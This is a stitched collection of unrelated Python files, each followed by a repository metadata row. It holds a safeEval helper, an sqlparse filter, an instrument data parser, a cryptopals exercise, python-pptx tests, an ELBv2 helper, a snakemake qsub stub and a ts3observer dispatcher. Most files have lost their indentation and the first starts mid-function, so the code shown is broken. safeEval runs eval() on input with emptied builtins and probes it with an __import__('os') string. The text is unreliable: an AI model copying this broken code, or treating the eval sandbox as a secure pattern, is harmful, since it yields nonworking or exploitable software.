env.update(vars(scipy.integrate).copy())
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = {'None': None, 'False': False, 'True':True} # None
env["slice"] = slice
if length is not None:
env["length"] = length
if x is not None:
env["x"] = x
    inp = re.sub(r'([0-9]+)[kK]', r'\g<1>*1024', str(inp))
try:
val = eval(inp, env)
if isinstance(val, str):
return None
if Type == 'All':
return val
if Type == 'FI': #single float/int type
if isinstance(val, (float, int)) and not np.isnan(val) and not np.isinf(val):
return val
return None
if Type == 'C': #single complex number
if isinstance(val, (float, int, complex)) and not np.isnan(val) and not np.isinf(val):
return val
return None
except Exception:
return None
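

# Illustrative usage (an added example, not part of the original module). Only
# names that safeEval itself exposes (numpy's `pi`, the 'k' suffix) are used.
if __name__ == '__main__':
    print(safeEval('2*pi', Type='FI'))    # ~6.283185307179586
    print(safeEval('1k'))                 # '1k' is expanded to 1*1024 -> 1024
    print(safeEval('__import__("os")'))   # builtins are blocked, so this returns None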
| smeerten/ssnake | src/safeEval.py | Python | gpl-3.0 | 2,736 | 0.00402 |
#
# Copyright (C) 2009-2020 the sqlparse authors and contributors
# <see AUTHORS file>
#
# This module is part of python-sqlparse and is released under
# the BSD License: https://opensource.org/licenses/BSD-3-Clause
from sqlparse import sql, tokens as T
from sqlparse.utils import offset, indent
class AlignedIndentFilter:
join_words = (r'((LEFT\s+|RIGHT\s+|FULL\s+)?'
r'(INNER\s+|OUTER\s+|STRAIGHT\s+)?|'
r'(CROSS\s+|NATURAL\s+)?)?JOIN\b')
by_words = r'(GROUP|ORDER)\s+BY\b'
split_words = ('FROM',
join_words, 'ON', by_words,
'WHERE', 'AND', 'OR',
'HAVING', 'LIMIT',
'UNION', 'VALUES',
'SET', 'BETWEEN', 'EXCEPT')
def __init__(self, char=' ', n='\n'):
self.n = n
self.offset = 0
self.indent = 0
self.char = char
self._max_kwd_len = len('select')
def nl(self, offset=1):
        # offset = 1 represents a single space after SELECT
offset = -len(offset) if not isinstance(offset, int) else offset
# add two for the space and parenthesis
indent = self.indent * (2 + self._max_kwd_len)
return sql.Token(T.Whitespace, self.n + self.char * (
self._max_kwd_len + offset + indent + self.offset))
def _process_statement(self, tlist):
if len(tlist.tokens) > 0 and tlist.tokens[0].is_whitespace \
and self.indent == 0:
tlist.tokens.pop(0)
# process the main query body
self._process(sql.TokenList(tlist.tokens))
def _process_parenthesis(self, tlist):
# if this isn't a subquery, don't re-indent
_, token = tlist.token_next_by(m=(T.DML, 'SELECT'))
if token is not None:
with indent(self):
tlist.insert_after(tlist[0], self.nl('SELECT'))
# process the inside of the parenthesis
self._process_default(tlist)
# de-indent last parenthesis
tlist.insert_before(tlist[-1], self.nl())
def _process_identifierlist(self, tlist):
# columns being selected
identifiers = list(tlist.get_identifiers())
identifiers.pop(0)
        for token in identifiers:
            tlist.insert_before(token, self.nl())
self._process_default(tlist)
def _process_case(self, tlist):
offset_ = len('case ') + len('when ')
cases = tlist.get_cases(skip_ws=True)
# align the end as well
end_token = tlist.token_next_by(m=(T.Keyword, 'END'))[1]
cases.append((None, [end_token]))
condition_width = [len(' '.join(map(str, cond))) if cond else 0
for cond, _ in cases]
max_cond_width = max(condition_width)
for i, (cond, value) in enumerate(cases):
# cond is None when 'else or end'
stmt = cond[0] if cond else value[0]
if i > 0:
tlist.insert_before(stmt, self.nl(offset_ - len(str(stmt))))
if cond:
ws = sql.Token(T.Whitespace, self.char * (
max_cond_width - condition_width[i]))
tlist.insert_after(cond[-1], ws)
def _next_token(self, tlist, idx=-1):
split_words = T.Keyword, self.split_words, True
tidx, token = tlist.token_next_by(m=split_words, idx=idx)
# treat "BETWEEN x and y" as a single statement
if token and token.normalized == 'BETWEEN':
tidx, token = self._next_token(tlist, tidx)
if token and token.normalized == 'AND':
tidx, token = self._next_token(tlist, tidx)
return tidx, token
def _split_kwds(self, tlist):
tidx, token = self._next_token(tlist)
while token:
# joins, group/order by are special case. only consider the first
# word as aligner
if (
token.match(T.Keyword, self.join_words, regex=True)
or token.match(T.Keyword, self.by_words, regex=True)
):
token_indent = token.value.split()[0]
else:
token_indent = str(token)
tlist.insert_before(token, self.nl(token_indent))
tidx += 1
tidx, token = self._next_token(tlist, tidx)
def _process_default(self, tlist):
self._split_kwds(tlist)
# process any sub-sub statements
for sgroup in tlist.get_sublists():
idx = tlist.token_index(sgroup)
pidx, prev_ = tlist.token_prev(idx)
# HACK: make "group/order by" work. Longer than max_len.
offset_ = 3 if (
prev_ and prev_.match(T.Keyword, self.by_words, regex=True)
) else 0
with offset(self, offset_):
self._process(sgroup)
def _process(self, tlist):
func_name = '_process_{cls}'.format(cls=type(tlist).__name__)
func = getattr(self, func_name.lower(), self._process_default)
func(tlist)
def process(self, stmt):
self._process(stmt)
return stmt
| andialbrecht/sqlparse | sqlparse/filters/aligned_indent.py | Python | bsd-3-clause | 5,110 | 0 |
#!/usr/bin/env python
"""
@package mi.dataset.parser.pco2a_a_dcl
@file marine-integrations/mi/dataset/parser/pco2a_a_dcl.py
@author Sung Ahn
@brief Parser for the pco2a_a_dcl dataset driver
This file contains code for the pco2a_a_dcl parser and code to produce data particles.
For instrument telemetered data, there is one driver which produces two (air/water) types of data particle.
For instrument recovered data, there is one driver which produces two (air/water) types of data particle.
The input files and the content of the data particles are the same for both
instrument telemetered and instrument recovered.
Only the names of the output particle streams are different.
The input file is ASCII and contains 2 types of records.
Records are separated by a newline.
All records start with a timestamp.
Metadata records: timestamp [text] more text newline.
Sensor Data records: timestamp sensor_data newline.
Only sensor data records produce particles if properly formed.
Mal-formed sensor data records and all metadata records produce no particles.
Release notes:
Initial Release
"""
__author__ = 'Sung Ahn'
__license__ = 'Apache 2.0'
import re
from mi.core.log import get_logger
log = get_logger()
from mi.core.common import BaseEnum
from mi.dataset.parser.dcl_file_common import DclInstrumentDataParticle, \
DclFileCommonParser, TIMESTAMP, \
START_METADATA, END_METADATA, START_GROUP, END_GROUP
from mi.dataset.parser.common_regexes import END_OF_LINE_REGEX, SPACE_REGEX, \
FLOAT_REGEX, UNSIGNED_INT_REGEX, TIME_HR_MIN_SEC_REGEX, ANY_CHARS_REGEX
from mi.dataset.parser.utilities import timestamp_yyyy_mm_dd_hh_mm_ss_to_ntp
from mi.core.instrument.data_particle import DataParticleKey
# Basic patterns
UINT = '(' + UNSIGNED_INT_REGEX + ')' # unsigned integer as a group
FLOAT = '(' + FLOAT_REGEX + ')' # floating point as a captured group
W_CHAR = r'(W)'
A_CHAR = r'(A)'
COMMA = ','
SHARP = '#'
CHAR_M = ' *M'
EXTRA_CR = r'\s*?'  # account for random <CR> found in some live files.
# Timestamp at the start of each record: YYYY/MM/DD HH:MM:SS.mmm
# Metadata fields: [text] more text
# Sensor data records have comma-delimited fields (date, time, and numeric values)
# All records end with one of the newlines.
SENSOR_DATE = r'(\d{4}/\d{2}/\d{2})'  # Sensor Date: YYYY/MM/DD
# Metadata record:
# Timestamp [Text]MoreText newline
METADATA_PATTERN = TIMESTAMP + SPACE_REGEX # dcl controller timestamp
METADATA_PATTERN += START_METADATA # Metadata record starts with '['
METADATA_PATTERN += ANY_CHARS_REGEX # followed by text
METADATA_PATTERN += END_METADATA # followed by ']'
METADATA_PATTERN += ANY_CHARS_REGEX # followed by more text
METADATA_PATTERN += END_OF_LINE_REGEX # metadata record ends with LF
METADATA_MATCHER = re.compile(METADATA_PATTERN)
# Sensor data record:
# Timestamp Date<space>Time<space>SensorData
# where SensorData is a comma-separated list of numeric values
SENSOR_DATA_PATTERN = TIMESTAMP + SPACE_REGEX # dcl controller timestamp
SENSOR_DATA_PATTERN += SHARP + START_GROUP + SENSOR_DATE + SPACE_REGEX # sensor date
SENSOR_DATA_PATTERN += TIME_HR_MIN_SEC_REGEX + END_GROUP + COMMA + CHAR_M + COMMA # sensor time
SENSOR_DATA_PATTERN += UINT + COMMA          # zero A/D counts
SENSOR_DATA_PATTERN += UINT + COMMA          # current A/D counts
SENSOR_DATA_PATTERN += FLOAT + COMMA         # measured CO2 (ppm)
SENSOR_DATA_PATTERN += FLOAT + COMMA         # average IRGA temperature
SENSOR_DATA_PATTERN += FLOAT + COMMA         # humidity
SENSOR_DATA_PATTERN += FLOAT + COMMA         # humidity temperature
SENSOR_DATA_PATTERN += UINT + COMMA          # gas stream pressure
SENSOR_DATA_PATTERN += FLOAT + COMMA         # IRGA detector temperature
SENSOR_DATA_PATTERN += FLOAT + COMMA         # IRGA source temperature
SENSOR_DATA_PATTERN_AIR = SENSOR_DATA_PATTERN + A_CHAR + EXTRA_CR + END_OF_LINE_REGEX
SENSOR_DATA_MATCHER_AIR = re.compile(SENSOR_DATA_PATTERN_AIR)
SENSOR_DATA_PATTERN_WATER = SENSOR_DATA_PATTERN + W_CHAR + EXTRA_CR + END_OF_LINE_REGEX
SENSOR_DATA_MATCHER_WATER = re.compile(SENSOR_DATA_PATTERN_WATER)
# Manual test is below
# >>me = re.match(r"((\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2})\.(\d{3})) #((\d{4}/\d{2}/\d{2})
# (\d{2}):(\d{2}):(\d{2})), *M,(\d*),(\d*),(\d+.\d+),(\d+.\d+),(\d+.\d+),(\d+.\d+),(\d*),
# (\d+.\d+),(\d+.\d+),(\D)",
# "2014/08/10 00:20:24.274 #3765/07/27 01:00:11, M,43032,40423,397.04,40.1,21.221,
# 28.480,1026,39.9,40.4,W")
# >>> me.group()
# '2014/08/10 00:20:24.274 #3765/07/27 01:00:11, M,43032,40423,397.04,40.1,21.221,28.480,1026,39.9,40.4,W'
# SENSOR_DATA_MATCHER produces the following groups.
# The following are indices into groups() produced by SENSOR_DATA_MATCHER.
# i.e, match.groups()[INDEX]
SENSOR_GROUP_SENSOR_DATE_TIME = 8
SENSOR_GROUP_SENSOR_DATE = 9
SENSOR_GROUP_SENSOR_HOUR = 10
SENSOR_GROUP_SENSOR_MINUTE = 11
SENSOR_GROUP_SENSOR_SECOND = 12
SENSOR_GROUP_ZERO_A2D = 13
SENSOR_GROUP_CURRENT_A2D = 14
SENSOR_GROUP_CO2 = 15
SENSOR_GROUP_AVG_IRGA_TEMP = 16
SENSOR_GROUP_HUMIDITY = 17
SENSOR_GROUP_HUMIDITY_TEMP = 18
SENSOR_GROUP_STREAM_PRESSURE = 19
SENSOR_GROUP_DETECTOR_TEMP = 20
SENSOR_GROUP_SOURCE_TEMP = 21
SENSOR_GROUP_SAMPLE_TYPE = 22
INSTRUMENT_PARTICLE_AIR_MAP = [
('zero_a2d', SENSOR_GROUP_ZERO_A2D, int),
('current_a2d', SENSOR_GROUP_CURRENT_A2D, int),
('measured_air_co2', SENSOR_GROUP_CO2, float),
('avg_irga_temperature', SENSOR_GROUP_AVG_IRGA_TEMP, float),
('humidity', SENSOR_GROUP_HUMIDITY, float),
('humidity_temperature', SENSOR_GROUP_HUMIDITY_TEMP, float),
('gas_stream_pressure', SENSOR_GROUP_STREAM_PRESSURE, int),
('irga_detector_temperature', SENSOR_GROUP_DETECTOR_TEMP, float),
('irga_source_temperature', SENSOR_GROUP_SOURCE_TEMP, float)
]
INSTRUMENT_PARTICLE_WATER_MAP = [
('zero_a2d', SENSOR_GROUP_ZERO_A2D, int),
('current_a2d', SENSOR_GROUP_CURRENT_A2D, int),
('measured_water_co2', SENSOR_GROUP_CO2, float),
('avg_irga_temperature', SENSOR_GROUP_AVG_IRGA_TEMP, float),
('humidity', SENSOR_GROUP_HUMIDITY, float),
('humidity_temperature', SENSOR_GROUP_HUMIDITY_TEMP, float),
('gas_stream_pressure', SENSOR_GROUP_STREAM_PRESSURE, int),
('irga_detector_temperature', SENSOR_GROUP_DETECTOR_TEMP, float),
('irga_source_temperature', SENSOR_GROUP_SOURCE_TEMP, float)
]
class DataParticleType(BaseEnum):
PCO2A_INSTRUMENT_AIR_PARTICLE = 'pco2a_a_dcl_instrument_air'
PCO2A_INSTRUMENT_WATER_PARTICLE = 'pco2a_a_dcl_instrument_water'
PCO2A_INSTRUMENT_AIR_RECOVERED_PARTICLE = 'pco2a_a_dcl_instrument_air_recovered'
PCO2A_INSTRUMENT_WATER_RECOVERED_PARTICLE = 'pco2a_a_dcl_instrument_water_recovered'
class Pco2aADclParticleClassKey(BaseEnum):
"""
An enum for the keys application to the pco2a_a_dcl particle classes
"""
AIR_PARTICLE_CLASS = 'air_particle_class'
WATER_PARTICLE_CLASS = 'water_particle_class'
class Pco2aADclInstrumentDataParticleAir(DclInstrumentDataParticle):
"""
    Class for generating pco2a_a_dcl air-sample instrument data particles.
"""
data_matcher = SENSOR_DATA_MATCHER_AIR
def __init__(self, raw_data, *args, **kwargs):
super(Pco2aADclInstrumentDataParticleAir, self).__init__(
raw_data, INSTRUMENT_PARTICLE_AIR_MAP, *args, **kwargs)
# instrument_timestamp is the internal_timestamp
instrument_timestamp = self.raw_data[SENSOR_GROUP_SENSOR_DATE_TIME]
elapsed_seconds_useconds = timestamp_yyyy_mm_dd_hh_mm_ss_to_ntp(instrument_timestamp)
self.set_internal_timestamp(elapsed_seconds_useconds)
# instrument clock is not accurate so, use port_timestamp as the preferred_ts
self.contents[DataParticleKey.PREFERRED_TIMESTAMP] = DataParticleKey.PORT_TIMESTAMP
class Pco2aADclInstrumentDataParticleWater(DclInstrumentDataParticle):
"""
    Class for generating pco2a_a_dcl water-sample instrument data particles.
"""
data_matcher = SENSOR_DATA_MATCHER_WATER
def __init__(self, raw_data, *args, **kwargs):
super(Pco2aADclInstrumentDataParticleWater, self).__init__(
raw_data, INSTRUMENT_PARTICLE_WATER_MAP, *args, **kwargs)
# Instrument timestamp is the internal timestamp
instrument_timestamp = self.raw_data[SENSOR_GROUP_SENSOR_DATE_TIME]
elapsed_seconds_useconds = timestamp_yyyy_mm_dd_hh_mm_ss_to_ntp(instrument_timestamp)
self.set_internal_timestamp(elapsed_seconds_useconds)
# instrument clock is not accurate so, use port_timestamp as the preferred_ts
self.contents[DataParticleKey.PREFERRED_TIMESTAMP] = DataParticleKey.PORT_TIMESTAMP
class Pco2aADclTelemeteredInstrumentDataParticleAir(Pco2aADclInstrumentDataParticleAir):
"""
Class for generating Offset Data Particles from Telemetered air data.
"""
_data_particle_type = DataParticleType.PCO2A_INSTRUMENT_AIR_PARTICLE
class Pco2aADclTelemeteredInstrumentDataParticleWater(Pco2aADclInstrumentDataParticleWater):
"""
Class for generating Offset Data Particles from Telemetered water data.
"""
_data_particle_type = DataParticleType.PCO2A_INSTRUMENT_WATER_PARTICLE
class Pco2aADclRecoveredInstrumentDataParticleAir(Pco2aADclInstrumentDataParticleAir):
"""
Class for generating Offset Data Particles from Recovered air data.
"""
_data_particle_type = DataParticleType.PCO2A_INSTRUMENT_AIR_RECOVERED_PARTICLE
class Pco2aADclRecoveredInstrumentDataParticleWater(Pco2aADclInstrumentDataParticleWater):
"""
Class for generating Offset Data Particles from Recovered water data.
"""
_data_particle_type = DataParticleType.PCO2A_INSTRUMENT_WATER_RECOVERED_PARTICLE
class Pco2aADclParser(DclFileCommonParser):
"""
This is the entry point for the parser.
"""
def __init__(self,
config,
stream_handle,
exception_callback):
super(Pco2aADclParser, self).__init__(config,
stream_handle,
exception_callback,
None,
METADATA_MATCHER)
| danmergens/mi-instrument | mi/dataset/parser/pco2a_a_dcl.py | Python | bsd-2-clause | 10,120 | 0.003063 |
#!/usr/bin/env python
# Written against python 3.3.1
# Matasano Problem 1
# Convert hex to base64
# Example hex: 49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d
# Example base64: SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t
import base64
import binascii
rawToHexLUT = ['00', '01', '02', '03', '04', '05', '06', '07', '08', '09', '0a', '0b', '0c', '0d', '0e', '0f',
'10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '1a', '1b', '1c', '1d', '1e', '1f',
'20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '2a', '2b', '2c', '2d', '2e', '2f',
'30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '3a', '3b', '3c', '3d', '3e', '3f',
'40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '4a', '4b', '4c', '4d', '4e', '4f',
'50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '5a', '5b', '5c', '5d', '5e', '5f',
'60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '6a', '6b', '6c', '6d', '6e', '6f',
'70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '7a', '7b', '7c', '7d', '7e', '7f',
'80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '8a', '8b', '8c', '8d', '8e', '8f',
'90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '9a', '9b', '9c', '9d', '9e', '9f',
'a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'a7', 'a8', 'a9', 'aa', 'ab', 'ac', 'ad', 'ae', 'af',
'b0', 'b1', 'b2', 'b3', 'b4', 'b5', 'b6', 'b7', 'b8', 'b9', 'ba', 'bb', 'bc', 'bd', 'be', 'bf',
'c0', 'c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c7', 'c8', 'c9', 'ca', 'cb', 'cc', 'cd', 'ce', 'cf',
'd0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6', 'd7', 'd8', 'd9', 'da', 'db', 'dc', 'dd', 'de', 'df',
'e0', 'e1', 'e2', 'e3', 'e4', 'e5', 'e6', 'e7', 'e8', 'e9', 'ea', 'eb', 'ec', 'ed', 'ee', 'ef',
'f0', 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'fa', 'fb', 'fc', 'fd', 'fe', 'ff',]
def base64toRaw(b64):
raw = base64.b64decode(b64);
return raw;
def rawToBase64(raw):
b64 = base64.b64encode(raw);
return b64;
def hexToRaw(hx):
raw = binascii.unhexlify(hx);
return raw;
def rawToHex(raw):
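    '''Convert raw bytes (or a str) to their hexadecimal representation, returned as bytes'''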
#hx = binascii.hexlify(raw);
hx = '';
for r in raw:
if type(r) != int:
r = ord(r);
hx += rawToHexLUT[r];
return bytes(hx, 'UTF-8');
def base64toHex(b64):
'''Convert Base64 string to hex string'''
return rawToHex(base64toRaw(b64));
def hexToBase64(hx):
'''Convert hex string to Base64'''
return rawToBase64(hexToRaw(hx));
def test1():
hx = b'49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d';
b64 = b'SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t';
if (base64toHex(b64) != hx):
print( "hex expected: " , hx);
print( "hex result: " , base64toHex(b64));
return False;
if (hexToBase64(hx) != b64):
print( "b64 expected: ", b64);
print( "b64 result: " , hexToBase64(hx));
return False;
return True;
if __name__ == "__main__":
if (test1()):
print("Program 1 success");
else:
print("Failure");
| reschly/cryptopals | prob1.py | Python | apache-2.0 | 3,439 | 0.018028 |
# encoding: utf-8
"""
Test suite for pptx.presentation module.
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
import pytest
from pptx.parts.coreprops import CorePropertiesPart
from pptx.parts.presentation import PresentationPart
from pptx.parts.slide import NotesMasterPart
from pptx.presentation import Presentation
from pptx.slide import SlideLayouts, SlideMaster, SlideMasters, Slides
from .unitutil.cxml import element, xml
from .unitutil.mock import class_mock, instance_mock, property_mock
class DescribePresentation(object):
def it_knows_the_height_of_its_slides(self, sld_height_get_fixture):
prs, expected_value = sld_height_get_fixture
assert prs.slide_height == expected_value
def it_can_change_the_height_of_its_slides(self, sld_height_set_fixture):
prs, slide_height, expected_xml = sld_height_set_fixture
prs.slide_height = slide_height
assert prs._element.xml == expected_xml
def it_knows_the_width_of_its_slides(self, sld_width_get_fixture):
prs, expected_value = sld_width_get_fixture
assert prs.slide_width == expected_value
def it_can_change_the_width_of_its_slides(self, sld_width_set_fixture):
prs, slide_width, expected_xml = sld_width_set_fixture
prs.slide_width = slide_width
assert prs._element.xml == expected_xml
def it_knows_its_part(self, part_fixture):
prs, prs_part_ = part_fixture
assert prs.part is prs_part_
def it_provides_access_to_its_core_properties(self, core_props_fixture):
prs, core_properties_ = core_props_fixture
assert prs.core_properties is core_properties_
def it_provides_access_to_its_notes_master(self, notes_master_fixture):
prs, notes_master_ = notes_master_fixture
assert prs.notes_master is notes_master_
def it_provides_access_to_its_slides(self, slides_fixture):
prs, rename_slide_parts_, rIds = slides_fixture[:3]
Slides_, slides_, expected_xml = slides_fixture[3:]
slides = prs.slides
rename_slide_parts_.assert_called_once_with(rIds)
Slides_.assert_called_once_with(
prs._element.xpath('p:sldIdLst')[0], prs
)
assert prs._element.xml == expected_xml
assert slides is slides_
def it_provides_access_to_its_slide_layouts(self, layouts_fixture):
prs, slide_layouts_ = layouts_fixture
assert prs.slide_layouts is slide_layouts_
def it_provides_access_to_its_slide_master(self, master_fixture):
prs, getitem_, slide_master_ = master_fixture
slide_master = prs.slide_master
getitem_.assert_called_once_with(0)
assert slide_master is slide_master_
def it_provides_access_to_its_slide_masters(self, masters_fixture):
prs, SlideMasters_, slide_masters_, expected_xml = masters_fixture
slide_masters = prs.slide_masters
SlideMasters_.assert_called_once_with(
prs._element.xpath('p:sldMasterIdLst')[0], prs
)
assert slide_masters is slide_masters_
assert prs._element.xml == expected_xml
def it_can_save_the_presentation_to_a_file(self, save_fixture):
prs, file_, prs_part_ = save_fixture
prs.save(file_)
prs_part_.save.assert_called_once_with(file_)
# fixtures -------------------------------------------------------
@pytest.fixture
def core_props_fixture(self, prs_part_, core_properties_):
prs = Presentation(None, prs_part_)
prs_part_.core_properties = core_properties_
return prs, core_properties_
@pytest.fixture
def layouts_fixture(self, masters_prop_, slide_layouts_):
prs = Presentation(None, None)
masters_prop_.return_value.__getitem__.return_value.slide_layouts = (
slide_layouts_
)
return prs, slide_layouts_
@pytest.fixture
def master_fixture(self, masters_prop_, slide_master_):
prs = Presentation(None, None)
getitem_ = masters_prop_.return_value.__getitem__
getitem_.return_value = slide_master_
return prs, getitem_, slide_master_
@pytest.fixture(params=[
('p:presentation',
'p:presentation/p:sldMasterIdLst'),
('p:presentation/p:sldMasterIdLst',
'p:presentation/p:sldMasterIdLst'),
])
def masters_fixture(self, request, SlideMasters_, slide_masters_):
prs_cxml, expected_cxml = request.param
prs = Presentation(element(prs_cxml), None)
expected_xml = xml(expected_cxml)
return prs, SlideMasters_, slide_masters_, expected_xml
@pytest.fixture
def notes_master_fixture(self, prs_part_, notes_master_):
prs = Presentation(None, prs_part_)
prs_part_.notes_master = notes_master_
return prs, notes_master_
@pytest.fixture
def part_fixture(self, prs_part_):
prs = Presentation(None, prs_part_)
return prs, prs_part_
@pytest.fixture
def save_fixture(self, prs_part_):
prs = Presentation(None, prs_part_)
file_ = 'foobar.docx'
return prs, file_, prs_part_
@pytest.fixture(params=[
('p:presentation', None),
('p:presentation/p:sldSz{cy=42}', 42),
])
def sld_height_get_fixture(self, request):
prs_cxml, expected_value = request.param
prs = Presentation(element(prs_cxml), None)
return prs, expected_value
@pytest.fixture(params=[
('p:presentation',
'p:presentation/p:sldSz{cy=914400}'),
('p:presentation/p:sldSz{cy=424242}',
'p:presentation/p:sldSz{cy=914400}'),
])
def sld_height_set_fixture(self, request):
prs_cxml, expected_cxml = request.param
prs = Presentation(element(prs_cxml), None)
expected_xml = xml(expected_cxml)
return prs, 914400, expected_xml
@pytest.fixture(params=[
('p:presentation', None),
('p:presentation/p:sldSz{cx=42}', 42),
])
def sld_width_get_fixture(self, request):
prs_cxml, expected_value = request.param
prs = Presentation(element(prs_cxml), None)
return prs, expected_value
@pytest.fixture(params=[
('p:presentation',
'p:presentation/p:sldSz{cx=914400}'),
('p:presentation/p:sldSz{cx=424242}',
'p:presentation/p:sldSz{cx=914400}'),
])
def sld_width_set_fixture(self, request):
prs_cxml, expected_cxml = request.param
prs = Presentation(element(prs_cxml), None)
expected_xml = xml(expected_cxml)
return prs, 914400, expected_xml
@pytest.fixture(params=[
('p:presentation', [], 'p:presentation/p:sldIdLst'),
('p:presentation/p:sldIdLst/p:sldId{r:id=a}', ['a'],
'p:presentation/p:sldIdLst/p:sldId{r:id=a}'),
('p:presentation/p:sldIdLst/(p:sldId{r:id=a},p:sldId{r:id=b})',
['a', 'b'],
'p:presentation/p:sldIdLst/(p:sldId{r:id=a},p:sldId{r:id=b})'),
])
def slides_fixture(self, request, part_prop_, Slides_, slides_):
prs_cxml, rIds, expected_cxml = request.param
prs = Presentation(element(prs_cxml), None)
rename_slide_parts_ = part_prop_.return_value.rename_slide_parts
expected_xml = xml(expected_cxml)
return prs, rename_slide_parts_, rIds, Slides_, slides_, expected_xml
# fixture components ---------------------------------------------
@pytest.fixture
def core_properties_(self, request):
return instance_mock(request, CorePropertiesPart)
@pytest.fixture
def masters_prop_(self, request):
return property_mock(request, Presentation, 'slide_masters')
@pytest.fixture
def notes_master_(self, request):
return instance_mock(request, NotesMasterPart)
@pytest.fixture
def part_prop_(self, request):
return property_mock(request, Presentation, 'part')
@pytest.fixture
def prs_part_(self, request):
return instance_mock(request, PresentationPart)
@pytest.fixture
def slide_layouts_(self, request):
return instance_mock(request, SlideLayouts)
@pytest.fixture
def SlideMasters_(self, request, slide_masters_):
return class_mock(
request, 'pptx.presentation.SlideMasters',
return_value=slide_masters_
)
@pytest.fixture
def slide_master_(self, request):
return instance_mock(request, SlideMaster)
@pytest.fixture
def slide_masters_(self, request):
return instance_mock(request, SlideMasters)
@pytest.fixture
def Slides_(self, request, slides_):
return class_mock(
request, 'pptx.presentation.Slides', return_value=slides_
)
@pytest.fixture
def slides_(self, request):
return instance_mock(request, Slides)
| biggihs/python-pptx | tests/test_presentation.py | Python | mit | 8,885 | 0 |
# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from cement.utils.misc import minimal_logger
from ..lib import aws
from ..objects.exceptions import ServiceError, NotFoundError
from ..resources.strings import responses
LOG = minimal_logger(__name__)
def _make_api_call(operation_name, **operation_options):
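    """Call the given ELBv2 API operation through the shared aws helper."""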
return aws.make_api_call('elbv2', operation_name, **operation_options)
def get_instance_healths_from_target_groups(target_group_arns):
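    """Return a mapping of instance id to the list of target-group health descriptions for that instance."""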
results = []
instance_healths = {}
for arn in target_group_arns:
try:
results.append( {
'TargetGroupArn': arn,
'Result': _make_api_call('describe_target_health', TargetGroupArn=arn)
} )
except ServiceError as e:
if e.message == responses['loadbalancer.targetgroup.notfound'].replace('{tgarn}', arn):
raise NotFoundError(e)
for result in results:
for description in result['Result']['TargetHealthDescriptions']:
instance_id = description['Target']['Id']
if instance_id not in instance_healths:
instance_healths[instance_id] = []
instance_healths[instance_id].append({
'TargetGroupArn': result['TargetGroupArn'],
'State': description['TargetHealth'].get('State', ''),
'Description': description['TargetHealth'].get('Description', ''),
'Reason': description['TargetHealth'].get('Reason', '')
})
    return instance_healths  # map of instance_id => [target group health descriptions]
def get_target_group_healths(target_group_arns):
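    """Return a mapping of target group ARN to its describe_target_health result."""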
results = {}
for arn in target_group_arns:
try:
results[arn] = _make_api_call('describe_target_health', TargetGroupArn=arn)
except ServiceError as e:
if e.code == 'TargetGroupNotFound':
raise NotFoundError(e)
else:
raise e
    return results  # map of target_group_arn => [target group health descriptions]
| quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/ebcli/lib/elbv2.py | Python | mit | 2,545 | 0.005108 |
#!/usr/bin/env python3
import sys
import os
import random
from snakemake.utils import read_job_properties
jobscript = sys.argv[1]
job_properties = read_job_properties(jobscript)
with open("qsub.log", "w") as log:
print(job_properties, file=log)
print(random.randint(1, 100))
os.system("sh {}".format(jobscript))
| gusevfe/snakemake | tests/test14/qsub.py | Python | mit | 319 | 0 |
#!/usr/bin/env python
import os, argparse, logging
from ts3observer.cli import CommandLineInterface as Cli
from ts3observer.gui import GraphicalUserInterface as Gui
from ts3observer.utils import path
from ts3observer.exc import CriticalException, ShutDownException, print_traceback, print_buginfo
class Dispatcher(object):
''' Dispatch the task to the right module '''
def __init__(self):
self._parse_arguments()
def _parse_arguments(self):
''' Parse the arguments from commandline '''
parser = argparse.ArgumentParser()
sub_parser = parser.add_subparsers(dest='task')
parser.add_argument('-v', '--verbose', action='store_true', help='Increase verbosity for debugging purpose')
        parser.add_argument('-q', '--quiet', action='store_true', help='Only show messages if there is a critical exception')
parser.add_argument('-g', '--graphical', action='store_true', help='Run the ts3observer as Gui')
        parser.add_argument('-d', '--dev', action='store_true', help='Run in developer mode')
utils_parser = sub_parser.add_parser('utils', help='Need some help?')
utils_sub_parser = utils_parser.add_subparsers(dest='utils')
utils_grouplist = utils_sub_parser.add_parser('servergrouplist', help='List all servergroups')
utils_channellist = utils_sub_parser.add_parser('channellist', help='List all channels')
utils_clientlist = utils_sub_parser.add_parser('clientlist', help='List all connected clients')
utils_clientlist.add_argument('-a', '--advanced', action='store_true', help='Get more information about the connected clients')
run_parser = sub_parser.add_parser('run', help='Run the ts3observer')
version_parser = sub_parser.add_parser('version', help='Shows the ts3observer version')
ts3o.args = parser.parse_args()
def dispatch(self):
''' Dispatch the task to the right module '''
if ts3o.args.graphical:
getattr(Gui(), ts3o.args.task)()
else:
getattr(Cli(), ts3o.args.task)()
class Ts3o(object):
''' Define a holder class '''
pass
def _setup():
''' Define some globals for ts3observer '''
__builtins__.ts3o = Ts3o()
